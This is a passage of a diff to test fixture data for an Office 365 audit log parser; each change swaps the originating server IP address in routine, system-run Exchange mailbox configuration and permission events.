+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5820,7 +5820,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5894,7 +5894,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5906,7 +5906,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -5980,7 +5980,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -5992,7 +5992,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -6066,7 +6066,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6078,7 +6078,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -6152,7 +6152,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -6164,7 +6164,7 @@
 "Operation": "Add-MailboxPermission",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -6194,7 +6194,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6206,7 +6206,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -6280,7 +6280,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
